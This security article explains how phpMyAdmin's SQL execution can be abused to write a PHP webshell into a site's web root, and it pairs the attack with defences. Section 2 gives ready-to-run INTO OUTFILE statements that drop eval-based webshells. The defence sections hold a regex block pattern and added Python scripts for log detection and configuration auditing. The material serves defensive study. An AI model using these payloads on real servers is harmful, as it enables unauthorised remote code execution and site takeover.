Getshell Via phpmyadmin SQL execution to Write Evil Webshell File into Disk


Directory

1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking

1. Vulnerability description

phpMyAdmin is a PHP-based, web-style MySQL database management tool that is deployed on a web server host and lets administrators manage MySQL databases through a web interface. The interface makes it easy to enter complex SQL, especially when importing and exporting large amounts of data. A major advantage is that, because phpMyAdmin runs on the web server like any other PHP program, the HTML pages it generates can be used from anywhere: the MySQL database can be managed remotely, and databases and tables can be created, modified and deleted with ease. phpMyAdmin can also generate common PHP snippets, which is convenient when writing web pages that must contain correct SQL syntax.


2. Vulnerability Trigger Condition

1. The phpMyAdmin root password is known, which is the root password of MySQL (phpMyAdmin is just a web-based tool used to connect to MySQL):
   1) MySQL itself has a default weak password
   2) the MySQL root password is obtained through another vulnerability (such as injection)
2. The physical path of the web site is known:
   1) in the phpMyAdmin back end, the "Variables" tab page shows the physical path of MySQL, from which the physical path of the site can be inferred
   2) the physical path of the web site is obtained through other web vulnerabilities

The core of getting a shell through phpMyAdmin is writing a file through SQL; the commonly used SQL is as follows:

    -- 1 --
    CREATE TABLE a (cmd TEXT NOT NULL);
    INSERT INTO a (cmd) VALUES ('<?php @eval($_POST[cmd])?>');
    SELECT cmd FROM a INTO OUTFILE 'c:/htdocs/1.php';
    DROP TABLE IF EXISTS a;
    DROP TABLE IF EXISTS `a`;
    -- 1 --

    -- 2 --
    SELECT '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'd:/wamp/www/exehack.php';
    -- 2 --

Relevant Link:

http://www.exehack.net/681.html
http://www.exehack.net/99.html
http://www.187299.com/archives/1695
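As an added example that is not part of the original article, the following Python script (not phpMyAdmin or MySQL code) shows how a defender can detect the pattern described above in the MySQL general query log: it flags every `INTO OUTFILE` / `INTO DUMPFILE` statement and rates it high when the target is a web-executable file under a configured web root. The log lines are constructed for the example and assume the MySQL 5.7+ general log layout (timestamp, connection id, command, argument); the web roots and function names are assumptions.

```python
import re

# Constructed sample of MySQL general_log lines (MySQL 5.7+ layout:
# "<timestamp> <connection id> <command> <argument>"). These entries are
# made up for this example, not log data from the original article.
SAMPLE_GENERAL_LOG = """\
2024-03-01T08:00:01.000000Z\t   17 Connect\troot@localhost on  using TCP/IP
2024-03-01T08:00:01.100000Z\t   17 Query\tSHOW VARIABLES LIKE 'datadir'
2024-03-01T08:00:02.000000Z\t   17 Query\tCREATE TABLE a (cmd text NOT NULL)
2024-03-01T08:00:03.000000Z\t   17 Query\tSELECT cmd FROM a INTO OUTFILE 'c:/htdocs/1.php'
2024-03-01T08:00:04.000000Z\t   18 Query\tSELECT name FROM users INTO OUTFILE '/var/lib/mysql-files/users.csv'
2024-03-01T08:00:05.000000Z\t   17 Query\tDROP TABLE IF EXISTS a
"""

# One general-log record: timestamp, connection id, command type, argument.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Server-side file write clauses; captures the kind and the quoted target path.
FILE_WRITE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)

# Extensions a web server executes if the file lands under its document root.
WEB_EXECUTABLE = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")


def find_file_writes(log_text, web_roots):
    """Return one finding per Query record that writes a server-side file.

    Each finding carries the connection id, the target path, the query and a
    severity: 'high' when the target is a web-executable file under one of
    web_roots, 'medium' for any other server-side file write.
    """
    findings = []
    roots = [r.replace("\\", "/").rstrip("/").lower() for r in web_roots]
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        for _kind, path in FILE_WRITE.findall(m.group("arg")):
            p = path.replace("\\", "/").lower()
            under_root = any(p.startswith(r + "/") for r in roots)
            executable = p.endswith(WEB_EXECUTABLE)
            severity = "high" if (under_root and executable) else "medium"
            findings.append({
                "conn": int(m.group("conn")),
                "path": path,
                "severity": severity,
                "query": m.group("arg"),
            })
    return findings


if __name__ == "__main__":
    # Web roots are assumed values for the example.
    for f in find_file_writes(SAMPLE_GENERAL_LOG, ["C:/htdocs", "/var/www/html"]):
        print(f"[{f['severity']}] conn {f['conn']} wrote {f['path']}: {f['query']}")
```

The general log has to be enabled for this to see anything (`general_log=ON`), and on a busy server an audit plugin is the more sustainable source; the matching logic is the same either way. Medium findings are worth reviewing too, since a legitimate export to the `secure_file_priv` directory and an attempt to write elsewhere look identical at the SQL level and differ only in the path.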


3. Vulnerability Impact Range

All phpMyAdmin versions


4. Vulnerability Code Analysis

/phpmyadmin/import.php

The logic that parses and executes user-submitted SQL is implemented in this PHP file.

    /* This code point is important: $import_text is the value that needs to be checked strictly */
    if ($go_sql) {
        // Parse SQL query
        include_once 'libraries/parse_analyze.inc.php';

        if (isset($ajax_reload) && $ajax_reload['reload'] === true) {
            $response = PMA_Response::getInstance();
            $response->addJSON('ajax_reload', $ajax_reload);
        }

        PMA_executeQueryAndSendQueryResponse(
            $analyzed_sql_results, false, $db, $table, null, $import_text, null,
            $analyzed_sql_results['is_affected'], null, null, null, null, $goto,
            $pmaThemeImage, null, null, null, $sql_query, null, null
        );
    } else if ($result) {
        // Save a bookmark with more than one queries (if Bookmark label given).
        if (! empty($_POST['bkm_label']) && ! empty($import_text)) {
            PMA_storeTheQueryAsBookmark(
                $db, $GLOBALS['cfg']['Bookmark']['user'], $import_text,
                $_POST['bkm_label'],
                isset($_POST['bkm_replace']) ? $_POST['bkm_replace'] : null
            );
        }

        $response = PMA_Response::getInstance();
        $response->isSuccess(true);
        $response->addJSON('message', PMA_Message::success($msg));
        $response->addJSON(
            'sql_query', PMA_Util::getMessage($msg, $sql_query, 'success')
        );
    } else if ($result == false) {
        $response = PMA_Response::getInstance();
        $response->isSuccess(false);
        $response->addJSON('message', PMA_Message::error($msg));
    } else {
        $active_page = $goto;
        include '' . $goto;
    }


5. Defense Methods

Checking the variable $import_text for malicious content is the defense against the getshell attack that abuses phpMyAdmin's SQL execution to export a file:

    if (preg_match("/select.*into.*outfile/i", $import_text, $matches)) {
        echo "request error!" . "<br />" . $matches[0];
        die();
    }
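The regex above only inspects the query text that phpMyAdmin submits; the control that actually decides whether `INTO OUTFILE` can place a file inside the web root is MySQL's `secure_file_priv` setting together with the `FILE` privilege. As an added example, not from the article or from phpMyAdmin, this Python helper (function names and sample values are assumptions) evaluates both from what `SHOW VARIABLES LIKE 'secure_file_priv'` and `SHOW GRANTS` return; the inputs below are constructed to mimic that output.

```python
import re

# Constructed sample values, shaped like the output of
#   SHOW VARIABLES LIKE 'secure_file_priv';   and   SHOW GRANTS FOR <account>;
# They are made up for this example.
SAMPLE_SECURE_FILE_PRIV = ""   # empty string: MySQL applies no directory restriction
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `app`.* TO 'app'@'localhost'",
    "GRANT FILE ON *.* TO 'report'@'%'",
]

# Only global grants (ON *.*) can carry FILE, which INTO OUTFILE requires.
GLOBAL_GRANT = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+\*\.\*\s+TO\s+(?P<who>'[^']*'@'[^']*')",
    re.IGNORECASE,
)


def accounts_with_file_privilege(grants):
    """Return the accounts whose global grants include FILE.

    ALL PRIVILEGES implies FILE, so it is treated the same way.
    """
    holders = []
    for g in grants:
        m = GLOBAL_GRANT.match(g.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            holders.append(m.group("who"))
    return holders


def _norm(path):
    return path.replace("\\", "/").rstrip("/").lower()


def assess_outfile_exposure(secure_file_priv, grants, web_root):
    """Summarise whether INTO OUTFILE could land a file inside web_root.

    secure_file_priv semantics (MySQL documentation):
      None (NULL) -> file import/export disabled entirely
      ''          -> no restriction; the server may write wherever mysqld can
      '<dir>'     -> writes are confined to that directory
    """
    holders = accounts_with_file_privilege(grants)
    root = _norm(web_root)
    if secure_file_priv is None:
        reach = "none"
    elif secure_file_priv == "":
        reach = "anywhere"
    else:
        d = _norm(secure_file_priv)
        overlaps = root == d or root.startswith(d + "/") or d.startswith(root + "/")
        reach = "web_root" if overlaps else "outside_web_root"
    exposed = reach in ("anywhere", "web_root") and bool(holders)
    return {"exposed": exposed, "reach": reach, "file_accounts": holders}


if __name__ == "__main__":
    # Web root is an assumed value for the example.
    print(assess_outfile_exposure(SAMPLE_SECURE_FILE_PRIV, SAMPLE_GRANTS, "C:/htdocs"))
```

A result of `exposed: True` means the application-layer regex is the only thing standing between a phpMyAdmin login and a file in the web root; the fix is to point `secure_file_priv` at a directory outside the document root (or set it to NULL if exports are not needed) and to reserve `FILE` for accounts that genuinely export data. Using a dedicated non-root MySQL account for phpMyAdmin removes the condition in section 2 that the attack depends on.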

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved
